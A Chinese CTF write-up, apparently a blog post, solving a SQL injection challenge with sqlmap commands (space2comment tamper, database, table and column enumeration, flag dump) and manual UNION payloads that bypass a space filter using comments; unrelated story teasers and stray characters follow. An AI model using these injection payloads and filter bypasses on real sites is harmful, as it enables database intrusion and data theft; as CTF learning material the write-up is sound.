CTF之sqlmap學(xué)習(xí)

題目名稱：簡(jiǎn)單的sql注入之2
地址http://www.shiyanbar.com/ctf/1908
有回顯的mysql注入

格式：flag{}

解題鏈接： [http://ctf5.shiyanbar.com/web/index_2.php](javascript:;)

sqlmap -u http://ctf5.shiyanbar.com/web/index_2.php?id=1 --tamper "space2comment.py" --level 2

image.png

sqlmap -u http://ctf5.shiyanbar.com/web/index_2.php?id=1 --tamper "space2comment.py" --current-db

image.png

//查看當(dāng)前數(shù)據(jù)庫(kù)（web1）

sqlmap -u http://ctf5.shiyanbar.com/web/index_2.php?id=1 --tamper "space2comment.py" -D web1 --tables

image.png

//查看表（flag）

image.png

sqlmap -u http://ctf5.shiyanbar.com/web/index_2.php?id=1 --tamper "space2comment.py" -D web1 -T flag --columns

//查看列（flag）

image.png

sqlmap -u http://ctf5.shiyanbar.com/web/index_2.php?id=1 --tamper "space2comment.py" -D web1 -T flag -C flag --dump

//查看flag信息

image.png

id=1''（兩個(gè)單引號(hào)）成功骆捧，id=1 '' 出錯(cuò)，說(shuō)明過(guò)濾空格切心。

繞過(guò)空格過(guò)濾的方式：

1. /**/

2. ()

3. %0B 據(jù)說(shuō)%0a-%0z都可以

4. 其他繞過(guò)方式

id=1'union//select//1' 查詢出兩條

id=1'//union//select//table_name//from/**/information_schema.tables' 出錯(cuò)荤牍，如果同上的話應(yīng)該是可以的宪塔，我不知道為什么

id=1'union//select//table_name//from//information_schema.tables//where//''=' 這樣是可以的

id=1'union//select//column_name//from//information_schema.columns//where//''='

id='union//select//flag//from//flag/**/where''='

• 人面猴

  序言：七十年代末，一起剝皮案震驚了整個(gè)濱河市，隨后出現(xiàn)的幾起案子衬吆，更是在濱河造成了極大的恐慌，老刑警劉巖绳泉，帶你破解...

  沈念sama閱讀 219,039評(píng)論 6贊 508
• 死咒

  序言：濱河連續(xù)發(fā)生了三起死亡事件逊抡，死亡現(xiàn)場(chǎng)離奇詭異，居然都是意外死亡零酪，警方通過(guò)查閱死者的電腦和手機(jī)秦忿，發(fā)現(xiàn)死者居然都...

  沈念sama閱讀 93,426評(píng)論 3贊 395
• 救了他兩次的神仙讓他今天三更去死

  文/潘曉璐 我一進(jìn)店門(mén)，熙熙樓的掌柜王于貴愁眉苦臉地迎上來(lái)蛾娶，“玉大人灯谣，你說(shuō)我怎么就攤上這事』桌牛” “怎么了胎许？”我有些...

  開(kāi)封第一講書(shū)人閱讀 165,417評(píng)論 0贊 356
• 道士緝兇錄：失蹤的賣(mài)姜人

  文/不壞的土叔 我叫張陵，是天一觀的道長(zhǎng)。 經(jīng)常有香客問(wèn)我辜窑，道長(zhǎng)钩述，這世上最難降的妖魔是什么？ 我笑而不...

  開(kāi)封第一講書(shū)人閱讀 58,868評(píng)論 1贊 295
• ?港島之戀（遺憾婚禮）

  正文 為了忘掉前任穆碎，我火速辦了婚禮牙勘，結(jié)果婚禮上，老公的妹妹穿的比我還像新娘所禀。我一直安慰自己方面，他們只是感情好，可當(dāng)我...

  茶點(diǎn)故事閱讀 67,892評(píng)論 6贊 392
• 惡毒庶女頂嫁案：這布局不是一般人想出來(lái)的

  文/花漫 我一把揭開(kāi)白布色徘。 她就那樣靜靜地躺著恭金，像睡著了一般。 火紅的嫁衣襯著肌膚如雪褂策。 梳的紋絲不亂的頭發(fā)上横腿，一...

  開(kāi)封第一講書(shū)人閱讀 51,692評(píng)論 1贊 305
• 城市分裂傳說(shuō)

  那天，我揣著相機(jī)與錄音斤寂，去河邊找鬼耿焊。 笑死，一個(gè)胖子當(dāng)著我的面吹牛遍搞，可吹牛的內(nèi)容都是我干的搀别。 我是一名探鬼主播，決...

  沈念sama閱讀 40,416評(píng)論 3贊 419
• 雙鴛鴦連環(huán)套：你想象不到人心有多黑

  文/蒼蘭香墨 我猛地睜開(kāi)眼尾抑，長(zhǎng)吁一口氣：“原來(lái)是場(chǎng)噩夢(mèng)啊……” “哼歇父！你這毒婦竟也來(lái)了？” 一聲冷哼從身側(cè)響起再愈，我...

  開(kāi)封第一講書(shū)人閱讀 39,326評(píng)論 0贊 276
• 萬(wàn)榮殺人案實(shí)錄

  序言：老撾萬(wàn)榮一對(duì)情侶失蹤榜苫，失蹤者是張志新（化名）和其女友劉穎，沒(méi)想到半個(gè)月后翎冲，有當(dāng)?shù)厝嗽跇?shù)林里發(fā)現(xiàn)了一具尸體垂睬，經(jīng)...

  沈念sama閱讀 45,782評(píng)論 1贊 316
• ?護(hù)林員之死

  正文 獨(dú)居荒郊野嶺守林人離奇死亡，尸身上長(zhǎng)有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...

  茶點(diǎn)故事閱讀 37,957評(píng)論 3贊 337
• ?白月光啟示錄

  正文 我和宋清朗相戀三年抗悍，在試婚紗的時(shí)候發(fā)現(xiàn)自己被綠了驹饺。 大學(xué)時(shí)的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片。...

  茶點(diǎn)故事閱讀 40,102評(píng)論 1贊 350
• 活死人

  序言：一個(gè)原本活蹦亂跳的男人離奇死亡缴渊，死狀恐怖赏壹，靈堂內(nèi)的尸體忽然破棺而出，到底是詐尸還是另有隱情衔沼，我是刑警寧澤蝌借，帶...

  沈念sama閱讀 35,790評(píng)論 5贊 346
• ?日本核電站爆炸內(nèi)幕

  正文 年R本政府宣布昔瞧，位于F島的核電站，受9級(jí)特大地震影響菩佑，放射性物質(zhì)發(fā)生泄漏自晰。R本人自食惡果不足惜，卻給世界環(huán)境...

  茶點(diǎn)故事閱讀 41,442評(píng)論 3贊 331
• 男人毒藥：我在死后第九天來(lái)索命

  文/蒙蒙 一稍坯、第九天 我趴在偏房一處隱蔽的房頂上張望酬荞。 院中可真熱鬧，春花似錦瞧哟、人聲如沸混巧。這莊子的主人今日做“春日...

  開(kāi)封第一講書(shū)人閱讀 31,996評(píng)論 0贊 22
• 一樁弒父案绢涡，背后竟有這般陰謀

  文/蒼蘭香墨 我抬頭看了看天上的太陽(yáng)。三九已至遣疯，卻和暖如春雄可，著一層夾襖步出監(jiān)牢的瞬間，已是汗流浹背缠犀。 一陣腳步聲響...

  開(kāi)封第一講書(shū)人閱讀 33,113評(píng)論 1贊 272
• 情欲美人皮

  我被黑心中介騙來(lái)泰國(guó)打工数苫， 沒(méi)想到剛下飛機(jī)就差點(diǎn)兒被人妖公主榨干…… 1. 我叫王不留，地道東北人辨液。 一個(gè)月前我還...

  沈念sama閱讀 48,332評(píng)論 3贊 373
• 代替公主和親

  正文 我出身青樓虐急，卻偏偏與公主長(zhǎng)得像，于是被迫代替她去往敵國(guó)和親滔迈。 傳聞我的和親對(duì)象是個(gè)殘疾皇子止吁，可洞房花燭夜當(dāng)晚...

  茶點(diǎn)故事閱讀 45,044評(píng)論 2贊 355